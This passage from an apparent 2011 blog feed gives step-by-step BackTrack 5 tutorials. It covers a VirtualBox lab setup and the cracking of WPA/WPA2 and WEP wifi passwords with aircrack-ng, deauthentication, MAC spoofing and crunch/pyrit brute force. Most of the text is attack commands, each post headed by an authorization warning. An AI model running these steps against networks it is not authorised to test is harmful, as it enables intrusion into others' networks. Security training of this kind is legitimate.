Remember not to enable USB 2.0 on the VirtualBox as some USB dongles do not work properly when it is enabled.&lt;br /&gt;
&lt;br /&gt;
Finally, the following wireless USB dongles have been tested and they are all working perfectly out of the box.  They are all support injection too.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;TP-Link TL-WN321G 54Mbps Wireless G USB Adapter&lt;br /&gt;
TP-Link TL-WN821N 300Mbps Wireless N USB Adapter&lt;br /&gt;
TP-Link TL-WN822N 300Mbps High Gain Wireless N USB Adapter&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*** This tutorial is also applied to VirtualBox 4.1.2.&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;Remarks :&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
When the kernel of Back|Track 5 is upgraded, the Guest Additions will be damaged.  You need to do the following on Back|Track 5 and then reinstall the Guest Additions :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;prepare-kernel-sources&lt;br /&gt;
cd /usr/src/linux&lt;br /&gt;
cp -rf include/generated/* include/linux/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;(B) Create Metasploitable virtual machine (Optional)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the following link to download the "&lt;code&gt;Metasploitable&lt;/code&gt;" which is an Ubuntu 8.04 server with some flaws.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;http://blog.metasploit.com/2010/05/introducing-metasploitable.html&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Set the downloaded Metasploitable as virtual hard drive at VirtualBox.  The network adapter is set to "&lt;code&gt;Host-Only&lt;/code&gt;".  The virtual hard disk space is at least 8GB and 512MB RAM for the Metasploitable.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;(C) The VirtualBox intranet&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Now, the IP address of eth0 of Metasploitable is similar to 192.168.56.101.  The IP address of eth0 and eth1 of Back|Track are similar to 10.0.2.15 and 192.168.56.102 respectively. &lt;br /&gt;
&lt;br /&gt;
You may require to execute the following command at Back|Track in order to see the two network interfaces and their IPs.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/etc/init.d/networking restart&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Back|Track can access (or ping) Metasploitable via IP address.  Back|Track can surf the internet but Metasploitable cannot.&lt;br /&gt;
&lt;br /&gt;
At last, your penetration environment is set up.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;(D) Free Tutorials&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(1) &lt;a href="http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training"&gt;Metaploit Unleashed&lt;/a&gt;&lt;br /&gt;
(2) &lt;a href="http://www.offensive-security.com/metasploit-unleashed/Fast-Track"&gt;Fast-Track&lt;/a&gt;&lt;br /&gt;
(3) &lt;a href="http://www.offensive-security.com/metasploit-unleashed/SET"&gt;Social-Engineer Tootkit&lt;/a&gt;&lt;br /&gt;
(4) &lt;a href="http://g0tmi1k.blogspot.com/"&gt;Got Milk?&lt;/a&gt;&lt;br /&gt;
(5) &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/34704-%5Bvideo%5D-metasploit-megaprimer-%3D-how-metasploit-beginner-advanced.html"&gt;How to Metasploit Beginner to Advanced (Video)&lt;/a&gt;&lt;br /&gt;
(6) &lt;a href="http://www.securitytube.net/groups?operation=viewall&amp;groupId=0"&gt;SecurityTube.net (Video)&lt;/a&gt;&lt;br /&gt;
(7) &lt;a href="http://www.backtrack-linux.org/wiki/index.php/Main_Page"&gt;BackTrack WiKi&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;(E) Non-free Training&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.offensive-security.com/"&gt;Offensive Security&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;(F) Resources&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
(1) &lt;a href="http://www.exploit-db.com/"&gt;Exploits Database&lt;/a&gt;&lt;br /&gt;
(2) &lt;a href="http://blog.metasploit.com/"&gt;Metaploit Blog&lt;/a&gt;&lt;br /&gt;
(3) &lt;a href="http://www.offensive-security.com/blog/"&gt;Offensive security Blog&lt;/a&gt;&lt;br /&gt;
(4) &lt;a href="http://www.gnacktrack.co.uk/index.php"&gt;Yet another Back|Track in Gnome&lt;/a&gt;&lt;br /&gt;
(5) &lt;a href="http://www.metasploit.com"&gt;Metasploit&lt;/a&gt;&lt;br /&gt;
(6) &lt;a href="http://www.exploit-db.com/google-dorks/"&gt;Google Hacking-Database&lt;/a&gt;&lt;br /&gt;
(7) &lt;a href="http://www.backbox.org/"&gt;BackBox Linux&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
You may find the following links useful :&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/05/howto-bug-fix-for-backtrack-5.html"&gt;HOWTO : Bug fix for Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/05/howto-wep-cracking-with-backtrack-5.html"&gt;HOWTO : WEP cracking with Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/05/howto-wpawpa2-cracking-with-backtrack-5.html"&gt;HOWTO : WPA/WPA2 cracking with Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2010/12/howto-no-skill-hacking-with-armitage-on.html"&gt;HOWTO : No skill hacking with Armitage on Back|Track 4 R2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/05/howto-sniffing-ssl-with-ettercap-on.html"&gt;HOWTO : Sniffing SSL with ettercap on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-onion-router-tor-on-backtrack-5.html"&gt;HOWTO : The Onion Router (Tor) on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-feedingbottle-32-on-backtrack-5.html"&gt;HOWTO : FeedingBottle 3.2 on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-update-script-for-backtrack-5.html"&gt;HOWTO : Update script for Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-yet-another-update-script-for.html"&gt;HOWTO : Yet Another Update script for Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-yet-another-backtrack-5-on-dell.html"&gt;HOWTO : Yet Another Back|Track 5 on Dell Streak 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2010/11/howto-rtl8191se-wireless-card-on.html"&gt;HOWTO : RTL8191SE wireless card on Back|Track 4 R2&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-adobe-flash-103-on-backtrack-5.html"&gt;HOWTO : Adobe Flash 10.3 on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-backtrack-5-on-lenovo-thinkpad.html"&gt;HOWTO : Back|Track 5 on Lenovo ThinkPad X100e&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/does-snort-really-protect-your-network.html"&gt;Does Snort really protect your network?&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-solves-wireshark-not-loading-on.html"&gt;HOWTO : Solves the Wireshark not loading on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/07/howto-register-to-osvdb-and-nessus-on.html"&gt;HOWTO : Register to OSVDB and Nessus on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/08/howto-anonymous-in-chatfreenodenet-with.html"&gt;HOWTO : Anonymous in chat.freenode.net with XChat&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/08/howto-pure-ftpd-and-atftpd-on-backtrack.html"&gt;HOWTO : Pure-ftpd and atftpd on Back|Track 5&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-ssh-tunneling-remote-port.html"&gt;HOWTO : SSH Tunneling - Remote Port Forwarding&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/howto-penetration-testing-in-real-world.html"&gt;HOWTO : Penetration Testing in the Real World&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://samiux.blogspot.com/2011/09/g0tmi1ks-video-series.html"&gt;g0tmi1k's Video Series&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8753626046090073069?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8753626046090073069'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8753626046090073069'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-backtrack-5-on-virtualbox-408.html' title='HOWTO : Back|Track 5 on VirtualBox 4.0.8'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8281536410718642605</id><published>2011-05-22T08:57:00.031+08:00</published><updated>2011-05-29T22:36:55.310+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='CUDA'/><category scheme='http://www.blogger.com/atom/ns#' term='pyrit'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA2'/><category scheme='http://www.blogger.com/atom/ns#' term='John the Ripper'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><category scheme='http://www.blogger.com/atom/ns#' term='crunch'/><category scheme='http://www.blogger.com/atom/ns#' term='WPA'/><title type='text'>HOWTO : WPA/WPA2 cracking with Back|Track 5</title><content type='html'>&lt;code&gt;Don't crack any wifi router without authorization; otherwise, you will be put into the jail.&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;(A) General Display card&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airmon-ng&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The result will be something like :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Interface&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Chipset&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Driver&lt;br /&gt;
wlan0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Intel 5100&amp;nbsp;&amp;nbsp;&amp;nbsp;iwlagn - [phy0]&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airmon-ng start wlan0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the mac address of the mon0 interface.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ifconfig mon0 down&lt;br /&gt;
macchanger -m 00:11:22:33:44:55 mon0&lt;br /&gt;
ifconfig mon0 up&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, press "&lt;code&gt;Ctrl+c&lt;/code&gt;" to break the program.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where -c is the channel&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -w is the file to be written&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; --bssid is the BSSID&lt;br /&gt;
&lt;br /&gt;
This terminal is keeping running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
open another terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where -a is the BSSID&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -c is the client MAC address (STATION)&lt;br /&gt;
&lt;br /&gt;
Wait for the handshake.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 7 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Use the John the Ripper as word list to crack the WPA/WP2 password.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 8 (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you do not want to use John the Ripper as word list, you can use Crunch.&lt;br /&gt;
&lt;br /&gt;
Go to the official site of crunch.&lt;br /&gt;
&lt;code&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Download crunch 3.0 (the current version at the time of this writing).&lt;br /&gt;
&lt;code&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvzf crunch-3.0.tgz&lt;br /&gt;
cd crunch-3.0&lt;br /&gt;
make&lt;br /&gt;
make install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -&lt;/code&gt; &lt;br /&gt;
&lt;br /&gt;
*where &lt;code&gt;8 16&lt;/code&gt; is the length of the password, i.e. from 8 characters to 16 characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;(B) nVidia Display Card with CUDA&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step a :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airmon-ng&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The result will be something like :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Interface&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Chipset&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Driver&lt;br /&gt;
wlan0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Intel 5100&amp;nbsp;&amp;nbsp;&amp;nbsp;iwlagn - [phy0]&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step b :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airmon-ng start wlan0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step c (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Change the mac address of the mon0 interface.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;ifconfig mon0 down&lt;br /&gt;
macchanger -m 00:11:22:33:44:55 mon0&lt;br /&gt;
ifconfig mon0 up&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step d :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Then, press "&lt;code&gt;Ctrl+c&lt;/code&gt;" to break the program.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step e :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step f :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
open another terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where -a is the BSSID&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -c is the client MAC address (STATION)&lt;br /&gt;
&lt;br /&gt;
Wait for the handshake.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step g :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If the following programs are not yet installed, please do it.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step h :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the official site of crunch.&lt;br /&gt;
&lt;code&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Download &lt;code&gt;crunch 3.0&lt;/code&gt; (the current version at the time of this writing).&lt;br /&gt;
&lt;code&gt;http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xvzf crunch-3.0.tgz&lt;br /&gt;
cd crunch-3.0&lt;br /&gt;
make&lt;br /&gt;
make install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step i :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Go to the official site of pyrit.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;http://code.google.com/p/pyrit/downloads/list&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Download &lt;code&gt;pyrit&lt;/code&gt; and &lt;code&gt;cpyrit-cuda&lt;/code&gt; (the current version is 0.4.0 at the time of this writing).&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xzvf pyrit-0.4.0.tar.gz&lt;br /&gt;
cd pyrit-0.4.0&lt;br /&gt;
python setup.py build&lt;br /&gt;
sudo python setup.py install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;tar -xzvf cpyrit-cuda-0.4.0.tar.gz&lt;br /&gt;
cd cpyrit-cuda-0.4.0&lt;br /&gt;
python setup.py build&lt;br /&gt;
sudo python setup.py install&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step j :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where &lt;code&gt;8 16&lt;/code&gt; is the length of the password, i.e. from 8 characters to 16 characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step k (Optional) :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you encounter error when reading the &lt;code&gt;wpacrack-01.cap&lt;/code&gt;, you should do the following step.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;pyrit -r wpacrack-01.cap -o new.cap stripLive&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where &lt;code&gt;8 16&lt;/code&gt; is the length of the password, i.e. from 8 characters to 16 characters.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step l :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Then, you will see something similar to the following.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com&lt;br /&gt;
This code is distributed under the GNU General Public License v3+&lt;br /&gt;
&lt;br /&gt;
Parsing file 'new.cap' (1/1)...&lt;br /&gt;
Parsed 71 packets (71 802.11-packets), got 55 AP(s)&lt;br /&gt;
&lt;br /&gt;
Tried 17960898 PMKs so far; 17504 PMKs per second.&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Remarks :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.&lt;br /&gt;
&lt;br /&gt;
To test if your wireless card (either USB or PCI-e) can do the injection or not :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng mon0&lt;/code&gt;&lt;br /&gt;
Open another terminal.&lt;br /&gt;
&lt;code&gt;aireplay-ng -9 mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Make sure pyrit workable on your system :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;pyrit list_cores&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8281536410718642605?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8281536410718642605'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8281536410718642605'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-wpawpa2-cracking-with-backtrack-5.html' title='HOWTO : WPA/WPA2 cracking with Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-8204836327980384182</id><published>2011-05-22T08:52:00.006+08:00</published><updated>2011-05-22T12:35:42.233+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='WEP'/><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : WEP cracking with Back|Track 5</title><content type='html'>&lt;code&gt;Don't crack any wifi router without authorization; otherwise, you will be put into the jail.&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airmon-ng&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
The result will be something like :&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;Interface&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Chipset&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Driver&lt;br /&gt;
wlan0&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Intel 5100&amp;nbsp;&amp;nbsp;&amp;nbsp;iwlagn - [phy0]&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 2 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airmon-ng start wlan0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 3 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
Press "&lt;code&gt;Ctrl+c&lt;/code&gt;" to break the program.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;airodump-ng -c 6 -w wepcrack --bssid 99:88:77:66:55:44 mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where -c is the channel&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -w is the file to be written&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; --bssid is the BSSID&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 5 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
open another terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;aireplay-ng -1 0 -a 99:88:77:66:55:44 mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where -a is BSSID&lt;br /&gt;
&lt;br /&gt;
The terminal is keeping running.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 6 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 99:88:77:66:55:44 mon0&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
*where -c is client's MAC address (STATION)&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; -b is BSSID&lt;br /&gt;
&lt;br /&gt;
When asking "&lt;code&gt;Use this packet?&lt;/code&gt;", answer "&lt;code&gt;y&lt;/code&gt;".&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 7 :&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
open another terminal.&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;aircrack-ng wepcrack*.cap&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-8204836327980384182?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8204836327980384182'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/8204836327980384182'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/05/howto-wep-cracking-with-backtrack-5.html' title='HOWTO : WEP cracking with Back|Track 5'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-894202329099895471</id><published>2011-05-21T07:51:00.005+08:00</published><updated>2011-05-27T00:04:52.070+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Back|Track'/><title type='text'>HOWTO : Bug fix for Back|Track 5</title><content type='html'>BackTrack 5 is a Penetration Testing Distribution and it is released on 